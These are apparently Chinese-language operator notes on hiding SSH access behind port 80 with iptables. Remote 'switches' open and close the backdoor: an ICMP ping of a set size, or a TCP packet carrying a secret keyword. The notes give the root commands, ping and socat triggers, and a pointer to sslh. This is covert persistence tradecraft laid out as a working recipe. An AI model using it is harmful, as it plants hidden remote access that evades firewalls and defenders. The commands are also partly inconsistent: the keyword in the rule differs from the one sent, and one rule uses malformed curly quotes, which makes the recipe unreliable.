使用icmp远程遥控开关,缺点在于如果目标在内网则无法ping通
[root@localhost ~]# iptables -t nat -N LETMEIN 创建端口复用链
[root@localhost ~]# iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22创建复用规则,将流量转向22端口
[root@localhost ~]# iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1139 -m recent --set --name letmein --rsource -j ACCEPT开启开关,如果接收到一个数据包大小为1139则将ip写入规则letmein
[root@localhost ~]# iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1140 -m recent --name letmein --remove -j ACCEPT关闭开关,如果接收到一个数据包大小为1140则将ip从letmein中去掉
[root@localhost ~]# iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN如果发现syn包的来源ip发送到letmein列表中则将跳转到letmein,时间为3600s
[root@localhost ~]# ping -c 1 -s 1111 192.168.140.135开启复用,1111为数据,剩下28为包头
PING 192.168.140.135 (192.168.140.135) 1111(1139) bytes of data.
1119 bytes from 192.168.140.135: icmp_seq=1 ttl=64 time=1.98 ms
--- 192.168.140.135 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.975/1.975/1.975/0.000 ms
[root@localhost ~]# ping -c 1 -s 1112 192.168.140.135关闭复用,1112为数据,剩下28为包头
PING 192.168.140.135 (192.168.140.135) 1112(1140) bytes of data.
1120 bytes from 192.168.140.135: icmp_seq=1 ttl=64 time=0.502 ms
--- 192.168.140.135 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.502/0.502/0.502/0.000 ms
利用 tcp 数据包中的关键字做遥控开关,不怕目标在内网
前些部分与icmp基本相同
[root@localhost ~]# iptables -t nat -N LETMEIN创建端口复用链
[root@localhost ~]# iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22创建复用规则将流量转向端口22
[root@localhost ~]# iptables -A INPUT -p tcp -m string --string 'zhimakaimen' --algo bm -m recent --set --name letmein --rsource -j ACCEPT开启开关
[root@localhost ~]# iptables -A INPUT -p tcp -m string --string ‘threathunterleaving’ --algo bm -m recent --name letmein --remove -j ACCEPT关闭开关
[root@localhost ~]# iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN跳转,时间为3600s
echo threathuntercoming | socat - tcp:192.168.10.129:80#打开
echo threathunterleaving | socat - tcp:192.168.10.129:80#关闭
sslh工具
[root@localhost ~]# sudo yum install epel-release下载
[root@localhost ~]# sudo yum install sslh下载
更改配置文件sslh.cfg
进行连接